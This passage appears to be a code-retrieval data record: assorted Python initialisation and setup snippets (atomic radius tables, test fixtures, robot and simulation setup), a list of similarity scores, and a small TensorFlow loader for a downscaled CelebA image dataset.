\"Kr\":( 0.56, 0.60, 0.138 ), \n\n \"Rb\":( 1.67, 2.43, 0.71 ),\n \"Sr\":( 1.42, 1.79, 0.633 ),\n \"Y\":( 1.32, 1.62, 0.58 ),\n \"Zr\":( 1.265, 1.56, 0.54 ),\n \"Nb\":( 1.23, 1.53, 0.51 ),\n \"Mo\":( 1.22, 1.50, 0.49 ),\n \"Tc\":( 1.16, 1.49, 0.455 ),\n \"Ru\":( 1.145, 1.46, 0.45 ),\n \"Rh\":( 1.11, 1.41, 0.42 ),\n \"Pd\":( 1.08, 1.37, 0.40 ), \n \"Ag\":( 1.045, 1.33, 0.385 ),\n \"Cd\":( 0.985, 1.23, 0.37 ),\n \"In\":( 0.94, 1.11, 0.36 ),\n \"Sn\":( 0.88, 1.00, 0.345 ),\n \"Sb\":( 0.83, 0.935, 0.335 ),\n \"Te\":( 0.79, 0.88, 0.325 ),\n \"I\":( 0.755, 0.83, 0.315 ),\n \"Xe\":( 0.75, 0.81, 0.305 ),\n \n \"Cs\":( 1.71, 2.60 ),\n \"Ba\":( 1.515, 1.887, 0.94 ),\n \"La\":( 1.375, 1.705, 0.874 ),\n \"Hf\":( 1.30, 1.61, 0.63 ),\n \"Ta\":( 1.25, 1.54, 0.605 ),\n \"W\":( 1.22, 1.515, 0.59 ), \n \"Re\":( 1.19, 1.49, 0.565 ),\n \"Os\":( 1.17, 1.48, 0.543 ),\n \"Ir\":( 1.16, 1.468, 0.526 ),\n \"Pt\":( 1.24, 1.46, 0.51 ),\n \"Au\":( 1.21, 1.45, 0.488 ),\n \"Hg\":( 1.07, 1.34, 0.475 ),\n \"Tl\":( 1.015, 1.22, 0.463 ),\n \"Pb\":( 0.96, 1.13, 0.45 ),\n \"Bi\":( 0.92, 1.077, 0.438 ),\n \"Po\":( 0.88, 1.02, 0.425 ),\n \"At\":( 0.85, 0.98, 0.475 ),\n \"Rn\":( 0.84, 0.94, 0.405 ) }", "def init_atom_coords(self) -> None:\n 
...", "def setUp(self):\n self.f1 = uniutil.polynomial(enumerate([3, 6, 81, 1]), Z)\n self.f2 = uniutil.polynomial(enumerate([1, 81, 6, 3]), Z)\n self.f3 = uniutil.polynomial(enumerate([37, 6, 18, 1]), Z)\n self.f4 = uniutil.polynomial(enumerate([91, 7, 14, 1]), Z)\n # f5 = (x - 6)(x - 5)...x(x + 1)(x + 2) - 1\n self.f5 = uniutil.polynomial(enumerate([1439, -1368, -1324,\n 1638, -231, -252,\n 114, -18, 1]), Z)", "def init():", "def __init__(self, project=None):\n HyppopySolver.__init__(self, project)", "def set_equations(self, *args, **kwargs):\n pass", "def test_constructor(self, circuit):\n assert list(circuit.wires) == [jet.Wire(i, 0, False) for i in range(4)]\n assert list(circuit.operations) == [jet.Operation(jet.Qubit(), [i]) for i in range(4)]", "def setup(self):\n self.poly2 = Polygon([(145, 60), (201, 69), (265, 46), (333, 61), (352, 99), (370, 129), (474, 138), (474, 178), (396, 225), (351, 275), (376, 312), (382, 356), (338, 368), (287, 302), (224, 304), (128, 338), (110, 316), (129, 270), (83, 231), (65, 51), (83, 163), (103, 201), (90, 74), (126, 162)])\n self.poly2.set_direction(\"E\")\n self.poly1 = Polygon([(905, 328),(877, 367),(944, 413),(1004, 384),(1019, 307),(953, 248),(880, 250),(865, 278),(883, 325)])\n self.poly1.set_direction(\"SW\")\n self.poly3 = Polygon([(900, 600), (950,650), (1000, 500)])\n self.poly3.set_direction(\"N\")\n self.p1 = Point(485, 138)\n self.p1.set_direction(\"SE\")\n self.p2 = Point(self.width/2, self.height/2)\n self.p2.set_direction(\"NW\")\n self.p3 = Point(86,163)\n self.p3.set_direction(\"SE\")\n #a separate list for each different type of shape for collision purposes.\n self.polys = [self.poly1, self.poly2, self.poly3]\n self.points = [self.p1, self.p2, self.p3]", "def __init__(self, elements):\n \n self.elements = elements\n self.has_experiment = False\n \n self._set_weight_percent_positions()\n self._set_boron_ppm_positions()\n self._make_core_universe()", "def setup_camera(self) -> None:\n self.world.camera.update(\n cam_base_pos=(0, -3, 0),\n cam_dist=1.2*self.world.env_dim,\n cam_yaw=0,\n cam_pitch=-60\n )", "def __init__(self):\n self._tyrannosaurus = []\n self._triceratops = []", "def _setOceanLocation(self):\r\n\t\t## If the fluids_hrc exists\r\n\t\tif cmds.objExists('fluids_hrc'):\r\n\t\t\tif cmds.objExists('ocean_srf'):\r\n\t\t\t\tcmds.connectAttr('fluids_hrc.translateX', 'ocean_srf.translateX', f = True)\r\n\t\t\t\tcmds.connectAttr('fluids_hrc.translateZ', 'ocean_srf.translateZ', f = True)\r\n\t\t\telse:\r\n\t\t\t\tcmds.warning('MISSING ocean_srf node from scene....')\r\n\r\n\t\t\tif cmds.objExists('oceanPreviewPlane_prv'):\r\n\t\t\t\tcmds.connectAttr('fluids_hrc.translateX', 'oceanPreviewPlane_prv.translateX', f = True)\r\n\t\t\t\tcmds.connectAttr('fluids_hrc.translateZ', 'oceanPreviewPlane_prv.translateZ', f = True)\r\n\t\t\telse:\r\n\t\t\t\tcmds.warning('MISSING oceanPreviewPlane_prv node from scene....')\r\n\t\telse:\r\n\t\t\tcmds.warning('NO fluids_hrc FOUND! Can not move the ocean into final position. 
PLEASE CHECK FX PUBLISH NOW!')", "def init_fig():\r\n # Set the axis and plot titles\r\n orbit, = ax.plot([], [], [])\r\n satellite, = ax.plot([], [], [], 'o', color='red')\r\n earth, = ax.plot([], [], [], 'o', color='green')\r\n time_text.set_text('')\r\n ax.set_title(Title_3D, fontsize=22)\r\n ax.set_xlim3d([-lim, lim])\r\n ax.set_xlabel('I\\n[km]')\r\n ax.set_ylim3d([-lim, lim])\r\n ax.set_ylabel('J\\n[km]')\r\n ax.set_zlim3d([-lim, lim])\r\n ax.set_zlabel('K\\n[km]')\r\n # plot Earth\r\n\r\n u = np.linspace(0, 2 * np.pi, 100)\r\n v = np.linspace(0, np.pi, 100)\r\n x = R_moon * np.outer(np.cos(u), np.sin(v))\r\n y = R_moon * np.outer(np.sin(u), np.sin(v))\r\n z = R_moon * np.outer(np.ones(np.size(u)), np.cos(v))\r\n ax.plot_wireframe(x, y, z, color=\"grey\", label=\"Moon\", linewidth=0.3, rstride=7, cstride=7)\r\n # Must return the list of artists, but we use a pass\r\n # through so that they aren't created multiple times\r\n return orbit, satellite, earth, time_text", "def _reset(self):\n # Make planets accessible as properties\n for body in self.bodies:\n setattr(self, body.name, body)\n self._names = np.array([p.name for p in self.bodies])\n\n # Initialize the C interface\n self._Compute = liborbit.Compute\n self._Compute.argtypes = [ctypes.c_int,\n ctypes.POINTER(ctypes.POINTER(Body)),\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_int]\n\n # Allocate memory for all the arrays\n for body in self.bodies:\n body.nt = 0\n body._transit_times = np.zeros(MAXTRANSITS)\n body._ptr_transit_times = \\\n np.ctypeslib.as_ctypes(body._transit_times)\n\n # A pointer to a pointer to `BODY`. This is an array of `n`\n # `BODY` instances, passed by reference. The contents can all be\n # accessed through `bodies`\n # NOTE: Before I subclassed BODY, this used to be\n # >>> self._ptr_bodies = (ctypes.POINTER(BODY) * \\\n # >>> len(self.bodies))(*[ctypes.pointer(p) for p in self.bodies])\n # I now cast the `Planet`, `Star`, and `Moon` instances as `BODY`\n # pointers, as per https://stackoverflow.com/a/37827528\n self._ptr_bodies = (ctypes.POINTER(Body) * len(self.bodies))(\n *[ctypes.cast(ctypes.byref(p),\n ctypes.POINTER(Body)) for p in self.bodies])", "def initialize_pins(self):\n\n for pin_name in self.pin_defs.keys():\n if self.pin_defs[pin_name]['mode'] == 'input':\n self.pin(pin_name).direction = digitalio.Direction.INPUT\n #logging.info('Pin {} set to {}'.format(pin_num, self.pin_defs[pin_num]['mode']))\n\n elif self.pin_defs[pin_name]['mode'] == 'output':\n self.pin(pin_name).switch_to_output(value=self.pin_defs[pin_name]['init'])\n #logging.info('Pin {} set to {}'.format(pin_num, self.pin_defs[pin_num]['mode']))\n\n else:\n logging.error('Error, no direction defined for pin {}, pin_defs: {}'\n .format(pin_name, self.pin_defs[pin_name]))", "def initialize_robot():\n\n proxy_motion = naoqi.ALProxy(\"ALMotion\", IP_ROBOT, PORT_ROBOT)\n proxy_motion.wakeUp()\n\n proxy_autonomous_life = naoqi.ALProxy(\"ALAutonomousLife\", IP_ROBOT, PORT_ROBOT)\n proxy_autonomous_life.setState(\"disabled\")\n\n proxy_motion = naoqi.ALProxy(\"ALMotion\", IP_ROBOT, PORT_ROBOT)\n proxy_motion.wakeUp()", "def set_earth(inclination, phases):\n cosi, sini = np.cos(inclination), np.sin(inclination)\n cosp = np.cos(2*np.pi*phases)\n sinp = np.sin(2*np.pi*phases)\n return CartesianRepresentation(sini*cosp, -sini*sinp, cosi)", "def setAllZero(self):\n self.robot.set_joint([0,0,0,0,0])\n self.robot.save_config()", "def setUp(self):\n # Set Model Parameters\n odeparam = 
np.array([0, 1, 1, 2])\n y0, y0_unc = np.ones(2), 0 * np.ones(2)\n t0, tmax = 0.0, 1.25\n\n # Set Method Parameters\n q = 1\n h = 0.1\n\n # Set up and solve ODE\n ibm = statespace.IBM(q=q, dim=len(y0))\n solver = linsolve.LinearisedODESolver(ibm)\n ivp = linode.LotkaVolterra(t0, tmax, odeparam, y0, y0_unc)\n tsteps, means, __, rhs_parts, uncerts = solver.solve(ivp, stepsize=h)\n self.mean = odesolver.get_trajectory_multidim(means, [0, 1], 0)\n\n # Set up BM and IBM covariance matrices\n evalpt = np.array(tsteps[[-1]])\n derdat = (tsteps, rhs_parts, 0.)\n\n const, jacob = linearisation.compute_linearisation(\n ssm=ibm, initial_value=y0,\n derivative_data=derdat, prdct_tsteps=evalpt)\n\n # Compute GP Estimation of filter mean at t=tmax\n postmean = const + np.dot(jacob, odeparam)\n self.postmean = postmean.reshape((2,))", "def setUp(self):\n # Set Model Parameters\n odeparam = np.array([0, 1, 1, 2])\n y0, y0_unc = np.ones(2), 0 * np.ones(2)\n t0, tmax = 0.0, 1.25\n\n # Set Method Parameters\n q = 1\n h = 0.1\n\n # Set up and solve ODE\n ibm = statespace.IBM(q=q, dim=len(y0))\n solver = linsolve.LinearisedODESolver(ibm)\n ivp = linode.LotkaVolterra(t0, tmax, odeparam, y0, y0_unc)\n tsteps, means, __, rhs_parts, uncerts = solver.solve(ivp, stepsize=h)\n self.mean = odesolver.get_trajectory_multidim(means, [0, 1], 0)\n\n # Set up BM and IBM covariance matrices\n evalpt = np.array(tsteps[[-1, -10]])\n derdat = (tsteps, rhs_parts, 0.)\n\n const, jacob = linearisation.compute_linearisation(\n ssm=ibm, initial_value=y0,\n derivative_data=derdat, prdct_tsteps=evalpt)\n\n # Compute GP Estimation of filter mean at t=tmax\n postmean = const + np.dot(jacob, odeparam)\n self.postmean = postmean.reshape((2, 2))", "def __init__(self):\n\n self.Cp_air0 = config_earth.earth_properties['Cp_air0']\n self.Rsp_air = config_earth.earth_properties['Rsp_air']\n\n self.d = config_earth.balloon_properties['d']\n self.vol = math.pi*4/3*pow((self.d/2),3) #volume m^3\n self.surfArea = math.pi*self.d*self.d #m^2\n self.cs_area = math.pi*self.d*self.d/4.0 #m^2\n\n #self.emissEnv = config_earth.balloon_properties['emissEnv']\n self.areaDensityEnv = config_earth.balloon_properties['areaDensityEnv']\n self.mp = config_earth.balloon_properties['mp']\n self.mdot = 0\n self.massEnv = config_earth.balloon_properties['mEnv']\n self.Upsilon = config_earth.balloon_properties['Upsilon']\n\n self.vent = config_earth.simulation['vent']\n self.coord = config_earth.simulation['start_coord']\n self.t = config_earth.simulation['start_time']\n self.lat = math.radians(self.coord['lat'])\n self.Ls = self.t.timetuple().tm_yday\n self.min_alt = config_earth.simulation['min_alt']\n\n self.vm_coeff = .1 #virtual mass coefficient\n self.k = self.massEnv*config_earth.balloon_properties['cp'] #thermal mass coefficient\n\n self.dt = config_earth.dt", "def __init__(self):\n GPIO.setmode(GPIO.BOARD)\n for light in self.all:\n GPIO.setup(light, GPIO.OUT)", "def __init__(self, features_number, surfaces_dimensions, taus, first_layer_polarities,\n delay_coeff, net_seed = 0, verbose=False):\n self.basis = []\n self.activations = []\n self.taus = taus\n self.layers = len(features_number)\n self.surfaces_dimensions = surfaces_dimensions\n self.features_number = features_number\n self.delay_coeff = delay_coeff\n self.verbose = verbose\n self.polarities = []\n self.polarities.append(first_layer_polarities)\n # attribute containing all surfaces computed in each layer and sublayer\n self.surfaces = []\n # attribute containing all optimization errors computed in 
each layer \n # and sublayer\n self.errors = []\n #setting the seed\n rng = np.random.RandomState()\n if (net_seed!=0):\n rng.seed(net_seed)\n # In the first layer I am going to process only 2 polarities corresponging\n # to on off events\n num_polarities = 1 \n for layer, nfeatures in enumerate(features_number):\n #basis and activations of a single sublayer\n sublayers_basis = []\n sublayers_activations = []\n self.polarities.append(nfeatures)\n for sublayer in range(2**layer):\n #basis and activations of a single layer\n basis_set = []\n activations_set = []\n for j in range(nfeatures):\n basis_set.append(rng.rand(surfaces_dimensions[layer][1], surfaces_dimensions[layer][0]*num_polarities))\n basis_set[j][surfaces_dimensions[layer][1]//2, [surfaces_dimensions[layer][0]//2 + surfaces_dimensions[layer][0]*a for a in range(num_polarities)]] = 1\n #activations, or aj (as in the paper) are set randomly between -1 and 1\n activations_set.append((rng.rand()-0.5)*2)\n sublayers_basis.append(np.array(basis_set))\n sublayers_activations.append(np.array(activations_set))\n self.basis.append(sublayers_basis)\n self.activations.append(sublayers_activations)\n num_polarities = nfeatures", "def setup(env, NUM_TRACKS, landtime, t_inter):\n # Create the airport\n airport = Airport(env, NUM_TRACKS, landtime)\n\n # Create 4 initial planes\n for i in range(1):\n env.process(plane(env, 'Aviao %d' % i, airport))\n\n # Create more planes while the simulation is running\n while True:\n yield env.timeout(random.randint(t_inter-2, t_inter+2))\n# yield env.timeout(random.expovariate(1.0 / t_inter))\n i += 1\n env.process(plane(env, 'Aviao %d' % i, airport))", "def teleopInit(self):\n self.Drive.resetEncoder()\n\n self.Drive.disableAutoForward()\n self.Drive.disableAutoTurn()\n self.Drive.disableVision()\n\n self.DS.setWhichVariable(True)\n self.Drive.updateSetpoint(\"teleop\")\n self.DS.setFirstTimeVariable(True)\n self.timer.reset()\n\n self.matchTime.startMode(isAuto=False)", "def setup_camera(self) -> None:\n self.world.camera.update(\n cam_base_pos=(3., 0, 2),\n cam_dist=2.5,\n cam_yaw=90,\n cam_pitch=-50\n )", "def reset(self):\n p.resetSimulation()\n p.setPhysicsEngineParameter(numSolverIterations=150)\n p.setTimeStep(self._time_step)\n p.setGravity(0, 0, -9.8)\n\n # load plane\n p.loadURDF(os.path.join(pybullet_data.getDataPath(), \"plane.urdf\"), [0, 0, 0])\n # load robot\n self._darwin = DarwinopEnv()\n\n # Let the world run for a bit\n for _ in range(20):\n p.stepSimulation()", "def __init__(self, x_coor, x_speed, y_coor, y_speed, direction):\n self.__x_coor = x_coor\n self.__x_speed = x_speed\n self.__y_coor = y_coor\n self.__y_speed = y_speed\n self.__direction = direction\n self.__radius = self.TORPEDO_RADIUS" ]
[ "0.59741217", "0.59616315", "0.59439087", "0.59116036", "0.58822644", "0.58440155", "0.5834586", "0.57733816", "0.5746145", "0.5736931", "0.57054114", "0.56986", "0.56339926", "0.5609833", "0.5579601", "0.5572102", "0.5556903", "0.55461323", "0.5529173", "0.5519832", "0.5515164", "0.5472385", "0.5467574", "0.5460015", "0.5438609", "0.54115", "0.5408959", "0.5399853", "0.53980935", "0.53942484", "0.5394079", "0.5393548", "0.5377922", "0.53761595", "0.5358563", "0.535133", "0.53391325", "0.53368145", "0.5336245", "0.5307493", "0.53017604", "0.52934134", "0.5284276", "0.52769476", "0.5269893", "0.52651155", "0.5261323", "0.52530164", "0.5250208", "0.5246166", "0.5244711", "0.5243743", "0.52421975", "0.5241909", "0.52403665", "0.5238439", "0.5237766", "0.52374095", "0.5236236", "0.5221624", "0.522048", "0.5217602", "0.5214162", "0.5211386", "0.5202315", "0.51984346", "0.5198142", "0.51854175", "0.518541", "0.51825017", "0.5178367", "0.51779556", "0.5168202", "0.51629955", "0.5160836", "0.51587945", "0.5157338", "0.51549584", "0.51547307", "0.5148965", "0.51434916", "0.5140861", "0.5138149", "0.51307267", "0.5129831", "0.5126325", "0.5124809", "0.5121294", "0.5119004", "0.511799", "0.5116539", "0.5113374", "0.5111088", "0.5108887", "0.5108782", "0.5108378", "0.5108325", "0.50906205", "0.5087886", "0.50875497" ]
0.64385605
0
Loads the preprocessed celeb_a dataset scaled down to 32x32
def get_celeb_a32():
    path = './data/celeb_a32'
    if not os.path.exists(path):
        print(path, " does not exist")
        return None
    images = utils.get_tensor_images_from_path(path)
    data = tf.data.Dataset.from_tensor_slices(images)
    data = data.map(lambda x: tf.cast(x, tf.float32))
    data = data.batch(int(tf.data.experimental.cardinality(data)))
    return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_celebA():\n channel_mean = [0.50003925, 0.42008925, 0.37377534]\n channel_std = [0.30878809, 0.28794379, 0.28661432]\n\n dataset = CelebA(transform=transforms.Compose([\n transforms.CenterCrop(178),\n transforms.Resize(64),\n transforms.ToTensor(),\n transforms.Normalize(channel_mean, channel_std)\n ]))\n\n setattr(dataset, \"mean\", channel_mean)\n setattr(dataset, \"std\", channel_std)\n\n loader_params = {\n \"num_workers\": 2,\n \"shuffle\": True,\n \"batch_size\": 128\n } \n\n train = DataLoader(dataset, **loader_params)\n\n return train", "def load_cifa_10():\n train_set_x = np.ndarray([ 50000, 3072 ])\n train_set_y = np.ndarray( [50000] )\n\n batch_size = 10000\n for i in xrange(5):\n batch = open( datapath + \"data_batch_\"+str(i+1), 'rb')\n map = cPickle.load( batch )\n batch.close()\n train_set_x[ i*batch_size : (i+1)*batch_size , : ] = np.asarray( map[ 'data' ], dtype = 'float32' )\n train_set_y[ i*batch_size : (i+1)*batch_size ] = np.asarray( map[ 'labels' ], dtype = 'float32' )\n\n test_file = open( datapath + 'test_batch', 'rb')\n map = cPickle.load( test_file )\n test_file.close()\n \n test_set_x = np.asarray( map['data'], dtype = 'float32' )\n test_set_y = np.asarray( map['labels'], dtype = 'float32' )\n \n\n return train_set_x, train_set_y, test_set_x, test_set_y", "def load_kiba_dataset():\n trainn_fold = json.load(\n open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'folds', 'train_fold_setting1.txt')))\n train_fold = []\n for e in zip(*trainn_fold):\n for ee in e:\n train_fold.extend(ee)\n #train_fold = [ee for e in trainn_fold for ee in e]\n test_fold = json.load(\n open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'folds', 'test_fold_setting1.txt')))\n ligands = json.load(\n open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'ligands_can.txt')),\n object_pairs_hook=OrderedDict)\n proteins = json.load(\n open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'proteins.txt')),\n object_pairs_hook=OrderedDict)\n \n affinity = pickle.load(open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'Y'), \n 'rb'), encoding='latin1')\n smiles_lst, protein_lst = [], []\n\n for k in ligands.keys():\n smiles = ligands[k]\n smiles_lst.append(smiles)\n for k in proteins.keys():\n protein_lst.append(proteins[k])\n\n affinity = np.asarray(affinity)\n \n os.makedirs(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'processed'), exist_ok=True)\n train_test_dataset = []\n for split in ['train', 'test']:\n split_dir = os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'processed', split)\n os.makedirs(split_dir, exist_ok=True)\n fold = train_fold if split == 'train' else test_fold\n rows, cols = np.where(np.isnan(affinity) == False)\n rows, cols = rows[fold], cols[fold]\n \n data_lst = [[] for _ in range(1)]\n for idx in range(len(rows)):\n data = {}\n data['smiles'] = smiles_lst[rows[idx]]\n data['protein'] = protein_lst[cols[idx]]\n af = affinity[rows[idx], cols[idx]]\n data['aff'] = af\n\n data_lst[idx % 1].append(data)\n random.shuffle(data_lst)\n train_test_dataset.append(data_lst[0])\n return train_test_dataset", "def load_CIFAR_batch(filename):\r\n with open(filename, 'rb') as f:\r\n datadict = pickle.load(f, encoding='latin1')\r\n X = datadict['data']\r\n Y = datadict['labels']\r\n X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype(\"float\")\r\n Y = np.array(Y)\r\n return X, Y", "def load_data(path=\"../data/cora/\", dataset=\"cora\"):\n print('Loading {} 
dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset),\n dtype=np.dtype(str))\n features = sp.sparse.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n# labels = encode_onehot(idx_features_labels[:, -1])\n values = np.unique(idx_features_labels[:, -1])\n values.sort()\n labels = np.zeros(idx_features_labels.shape[0])\n for i in range(labels.shape[0]):\n labels[i] = np.where(values == idx_features_labels[i, -1])[0][0]\n labels = torch.tensor(labels).long()\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset),\n dtype=np.int32)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.sparse.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]),\n dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n# features = normalize(features)\n adj = normalize(adj + sp.sparse.eye(adj.shape[0]))\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n features = torch.FloatTensor(np.array(features.todense()))\n# labels = torch.LongTensor(np.where(labels)[1])\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, features, labels, idx_train, idx_val, idx_test", "def load_CIFAR_batch(filename):\n with open(filename, 'rb')as f:\n datadict = p.load(f, encoding='iso-8859-1')\n X = datadict['data']\n Y = datadict['labels']\n X = X.reshape(10000, 3, 32, 32)\n Y = np.array(Y)\n return X, Y", "def load_CIFAR_batch(filename):\n with open(filename, 'rb') as f:\n datadict = pickle.load(f, encoding='latin1')\n X = datadict['data']\n Y = datadict['labels']\n X = X.reshape(10000, 3, 32, 32).transpose(0, 2, 3, 1).astype(\"float64\")\n Y = np.array(Y)\n return X, Y", "def load_batch(batch_name):\n data_dict = unpickle('./datasets/cifar-10-batches-py/' + batch_name)\n X = data_dict[b'data'] / 255\n X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).reshape(10000, 3072).transpose(1,0)\n y = data_dict[b'labels']\n Y = make_one_hot(y)\n return X, Y, y", "def load_CIFAR_batch(filename):\n with open(filename, 'rb')as f:\n # datadict = p.load(f)\n datadict = pickle.load(f, encoding = 'bytes')\n X = datadict[b'data']\n Y = datadict[b'labels']\n X = X.reshape(10000, 3, 32, 32)\n Y = np.array(Y)\n return X, Y", "def __loadPreProcessedData(self):\n le = joblib.load(self.le_filename)\n X = np.loadtxt(self.X_filename, delimiter=',').astype(int)\n raw_y = np.loadtxt(self.y_filename, delimiter=',').astype(int)\n y = le.inverse_transform(raw_y)\n ##Initialize atrtribute for this class\n self.le, self.X, self.y = le, X, y", "def load_data():\n (trainx, trainy), (valx, valy), (testx, testy) = pickle.load(gzip.open(\"data/mnist_one_hot.pkl.gz\"),\n encoding=\"latin1\")\n trainy = np.argmax(trainy, axis=1)\n valy = np.argmax(valy, axis=1)\n testy = np.argmax(testy, axis=1)\n trainx = trainx * 2 - 1\n valx = valx * 2 - 1\n testx = testx * 2 - 1\n return (trainx.reshape(-1, 1, 28, 28), trainy), (valx.reshape(-1, 1, 28, 28), valy), (testx.reshape(-1, 1, 28, 28),\n testy)", "def load_data_pkl(self):\n pkl_name = '{}/data/mini-imagenet-cache-{}.pkl'.format(self.root_dir, self.split)\n 
print('Loading pkl dataset: {} '.format(pkl_name))\n\n try:\n with open(pkl_name, \"rb\") as f:\n data = pkl.load(f, encoding='bytes')\n image_data = data[b'image_data']\n class_dict = data[b'class_dict']\n except:\n with open(pkl_name, \"rb\") as f:\n data = pkl.load(f)\n image_data = data['image_data']\n class_dict = data['class_dict']\n\n print(data.keys(), image_data.shape, class_dict.keys())\n data_classes = sorted(class_dict.keys()) # sorted to keep the order\n\n n_classes = len(data_classes)\n print('n_classes:{}, n_label:{}, n_unlabel:{}'.format(n_classes,self.n_label,self.n_unlabel))\n dataset_l = np.zeros([n_classes, self.n_label, self.im_height, self.im_width, self.channels], dtype=np.float32)\n if self.n_unlabel>0:\n dataset_u = np.zeros([n_classes, self.n_unlabel, self.im_height, self.im_width, self.channels], dtype=np.float32)\n else:\n dataset_u = []\n\n for i, cls in enumerate(data_classes):\n idxs = class_dict[cls] \n np.random.RandomState(self.seed).shuffle(idxs) # fix the seed to keep label,unlabel fixed\n dataset_l[i] = image_data[idxs[0:self.n_label]]\n if self.n_unlabel>0:\n dataset_u[i] = image_data[idxs[self.n_label:]]\n print('labeled data:', np.shape(dataset_l))\n print('unlabeled data:', np.shape(dataset_u))\n \n self.dataset_l = dataset_l\n self.dataset_u = dataset_u\n self.n_classes = n_classes\n\n del image_data", "def prepare_data(src, dst):\n\n data_prefix = 'miniCelebA_'\n for split in ['train', 'val', 'test']:\n print('processing %s split' % split)\n if (not os.path.exists(os.path.join(dst, 'x_' + split + '.npy')) or not\n os.path.exists(os.path.join(dst, 'y_' + split + '.npy'))):\n labels = glob(os.path.join(src, split, '*'))\n no_sample = 0\n for lb in labels:\n no_sample += len(os.listdir(lb))\n\n x = np.zeros((no_sample, 224, 224, 3))\n y = np.zeros((no_sample, 20))\n count = 0\n for lb in labels:\n files = glob(os.path.join(lb, '*.png'))\n for f in files:\n print('processing file: %s, with label %s' % (f, lb.split('/')[-1]))\n y[count] = to_categorical(int(lb.split('/')[-1]), 20)\n img = misc.imresize(misc.imread(f), (224, 224), 'bicubic')\n if img.ndim == 2:\n img = np.expand_dims(img, -1)\n img = np.concatenate((img, img, img), axis=-1)\n x[count] = img\n\n count += 1\n\n assert count == no_sample, \"number of sample (%d) is different than number of read image (%d)\" % (\n no_sample, count)\n\n x = get_deep_feature(x)\n np.save(os.path.join(dst, data_prefix + 'x_' + split + '.npy'), x)\n np.save(os.path.join(dst, data_prefix + 'y_' + split + '.npy'), y)", "def load_batch(filename: str) -> Tuple[ndarray, ndarray, ndarray]:\n dataDict = unpickle(filename)\n print(\"1\", dataDict[b\"data\"][1, :])\n X = (dataDict[b\"data\"] / 255).T\n print(\"2\", X[:, 1])\n y = np.array(dataDict[b\"labels\"])\n Y = np.eye(10)[y].T\n return X, Y, y", "def load_data(path=\"./data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset), dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n labels = encode_onehot(idx_features_labels[:, -1])\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset), dtype=np.int32)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())), dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], 
edges[:, 1])), shape=(labels.shape[0], labels.shape[0]), dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n features = normalize_features(features)\n adj = normalize_adj(adj + sp.eye(adj.shape[0]))\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n adj = torch.FloatTensor(np.array(adj.todense()))\n features = torch.FloatTensor(np.array(features.todense()))\n labels = torch.LongTensor(np.where(labels)[1])\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, features, labels, idx_train, idx_val, idx_test", "def load_data(self):\n print('Loading {} dataset'.format(self.split))\n data_split_path = os.path.join(self.root_dir, 'splits', '{}.csv'.format(self.split))\n with open(data_split_path,'r') as f:\n reader = csv.reader(f, delimiter=',')\n data_classes = {}\n for i,row in enumerate(reader):\n if i==0:\n continue\n data_classes[row[1]] = 1\n data_classes = data_classes.keys()\n print(data_classes)\n\n n_classes = len(data_classes)\n print('n_classes:{}, n_label:{}, n_unlabel:{}'.format(n_classes,self.n_label,self.n_unlabel))\n dataset_l = np.zeros([n_classes, self.n_label, self.im_height, self.im_width, self.channels], dtype=np.float32)\n if self.n_unlabel>0:\n dataset_u = np.zeros([n_classes, self.n_unlabel, self.im_height, self.im_width, self.channels], dtype=np.float32)\n else:\n dataset_u = []\n\n for i, cls in enumerate(data_classes):\n im_dir = os.path.join(self.root_dir, 'data/{}/'.format(self.split), cls)\n im_files = sorted(glob.glob(os.path.join(im_dir, '*.jpg')))\n np.random.RandomState(self.seed).shuffle(im_files) # fix the seed to keep label,unlabel fixed\n for j, im_file in enumerate(im_files):\n im = np.array(Image.open(im_file).resize((self.im_width, self.im_height)), \n np.float32, copy=False)\n if j<self.n_label:\n dataset_l[i, j] = im\n else:\n dataset_u[i,j-self.n_label] = im\n print('labeled data:', np.shape(dataset_l))\n print('unlabeled data:', np.shape(dataset_u))\n \n self.dataset_l = 